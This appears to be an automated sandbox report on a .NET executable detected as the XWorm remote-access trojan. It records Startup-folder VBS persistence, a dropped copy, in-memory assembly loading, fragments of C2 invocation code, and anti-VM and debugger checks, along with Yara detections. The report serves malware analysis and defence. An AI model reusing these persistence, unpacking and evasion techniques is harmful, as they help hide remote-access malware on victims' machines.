Source: 0.2.Enquiry#039855.exe.6070000.11.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Enquiry#039855.exe.6070000.11.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Enquiry#039855.exe.6070000.11.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: Enquiry#039855.exe, Gicmx.cs	Suspicious method names: .Gicmx.FetchPayloadAsync
Source: Enquiry#039855.exe, Gicmx.cs	Suspicious method names: .Gicmx.FetchPayloadFromFileAsync
Source: Enquiry#039855.exe, Gicmx.cs	Suspicious method names: .Gicmx.FetchPayloadFromNetworkAsync
Source: Sign.exe.0.dr, Gicmx.cs	Suspicious method names: .Gicmx.FetchPayloadAsync
Source: Sign.exe.0.dr, Gicmx.cs	Suspicious method names: .Gicmx.FetchPayloadFromFileAsync
Source: Sign.exe.0.dr, Gicmx.cs	Suspicious method names: .Gicmx.FetchPayloadFromNetworkAsync

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@4/3@1/1

Source: C:\Users\user\Desktop\Enquiry#039855.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sign.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Mutant created: \Sessions\1\BaseNamedObjects\56TvElZMbqDoRvU7
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1540:64:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\cd75fd78-1abc-456f-8d18-69310a7d6b71

Jump to behavior

Source: Enquiry#039855.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Enquiry#039855.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Enquiry#039855.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Enquiry#039855.exe	Virustotal: Detection: 25%
Source: Enquiry#039855.exe	ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\Enquiry#039855.exe

File read: C:\Users\user\Desktop\Enquiry#039855.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Enquiry#039855.exe "C:\Users\user\Desktop\Enquiry#039855.exe"
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process created: C:\Users\user\Desktop\Enquiry#039855.exe "C:\Users\user\Desktop\Enquiry#039855.exe"
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 920
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process created: C:\Users\user\Desktop\Enquiry#039855.exe "C:\Users\user\Desktop\Enquiry#039855.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Enquiry#039855.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Enquiry#039855.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\Desktop\Enquiry#039855.PDB source: Enquiry#039855.exe, 00000002.00000002.2694036388.00000000005D9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: Enquiry#039855.exe, 00000002.00000002.2694036388.0000000000601000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Enquiry#039855.exe, 00000000.00000002.1799466675.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Enquiry#039855.exe, 00000000.00000002.1799466675.0000000003D21000.00000004.00000800.00020000.00000000.sdmp, Enquiry#039855.exe, 00000000.00000002.1802245271.0000000006070000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Enquiry#039855.exe, 00000000.00000002.1799466675.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Enquiry#039855.exe, 00000000.00000002.1799466675.0000000003D21000.00000004.00000800.00020000.00000000.sdmp, Enquiry#039855.exe, 00000000.00000002.1802245271.0000000006070000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\Enquiry#039855.PDB source: Enquiry#039855.exe, 00000002.00000002.2693782848.00000000001D8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: h>cHPJo,C:\Windows\System.pdb source: Enquiry#039855.exe, 00000002.00000002.2693782848.00000000001D8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbk source: Enquiry#039855.exe, 00000002.00000002.2694036388.000000000062B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbz source: Enquiry#039855.exe, 00000002.00000002.2694036388.0000000000616000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: Enquiry#039855.exe, 00000002.00000002.2694036388.0000000000616000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb@ source: Enquiry#039855.exe, 00000002.00000002.2694036388.00000000005C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: Enquiry#039855.exe, 00000002.00000002.2693782848.00000000001D8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: Enquiry#039855.exe, 00000002.00000002.2694036388.0000000000601000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbof source: Enquiry#039855.exe, 00000002.00000002.2694036388.000000000062B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: Enquiry#039855.exe, Xhpzgptjrav.cs	.Net Code: Jqhpoahwntv System.AppDomain.Load(byte[])
Source: Sign.exe.0.dr, Xhpzgptjrav.cs	.Net Code: Jqhpoahwntv System.AppDomain.Load(byte[])
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.Enquiry#039855.exe.6170000.12.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.Enquiry#039855.exe.6170000.12.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.Enquiry#039855.exe.6170000.12.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.Enquiry#039855.exe.6170000.12.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.Enquiry#039855.exe.6170000.12.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.Enquiry#039855.exe.6070000.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Enquiry#039855.exe.6070000.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Enquiry#039855.exe.6070000.11.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, Messages.cs	.Net Code: Memory

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.Enquiry#039855.exe.5f90000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Enquiry#039855.exe.5f90000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1802060515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Enquiry#039855.exe PID: 5932, type: MEMORYSTR

Source: 0.2.Enquiry#039855.exe.5cf0000.8.raw.unpack, m69Q7o1nsYipJYg7Fdm.cs

High entropy of concatenated method names: 'PSs1ScbHen', 'IvM1YpiW1j', 'Xde1jWJ87k', 'gOZ1wmEK0x', 'JTL1edX4Ww', 'dt013qkK9F', 'PSl1ieSPpg', 'DUw1J9tbrH', 'IMN1kfkd1g', 'pP21dGCu2Q'

Source: C:\Users\user\Desktop\Enquiry#039855.exe

File created: C:\Users\user\AppData\Roaming\Sign.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\Enquiry#039855.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sign.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\Enquiry#039855.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sign.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sign.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Enquiry#039855.exe PID: 5932, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Enquiry#039855.exe, 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Enquiry#039855.exe	Memory allocated: 1300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Memory allocated: 2D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Memory allocated: 2B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Memory allocated: 870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Memory allocated: 22B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Memory allocated: 42B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: Enquiry#039855.exe, 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: Enquiry#039855.exe, 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: Enquiry#039855.exe, 00000000.00000002.1792617340.00000000010D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Enquiry#039855.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, NativeMethods.cs	Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 0.2.Enquiry#039855.exe.3d99530.5.raw.unpack, ResourceReferenceValue.cs	Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
Source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Source: C:\Users\user\Desktop\Enquiry#039855.exe

Process created: C:\Users\user\Desktop\Enquiry#039855.exe "C:\Users\user\Desktop\Enquiry#039855.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe	Queries volume information: C:\Users\user\Desktop\Enquiry#039855.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Queries volume information: C:\Users\user\Desktop\Enquiry#039855.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Enquiry#039855.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Enquiry#039855.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.Enquiry#039855.exe.2e4da88.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Enquiry#039855.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1793313944.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Enquiry#039855.exe PID: 5932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Enquiry#039855.exe PID: 4536, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.Enquiry#039855.exe.2e4da88.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Enquiry#039855.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Enquiry#039855.exe.2e4da88.0.raw.unpack, type: UNPACKEDPE
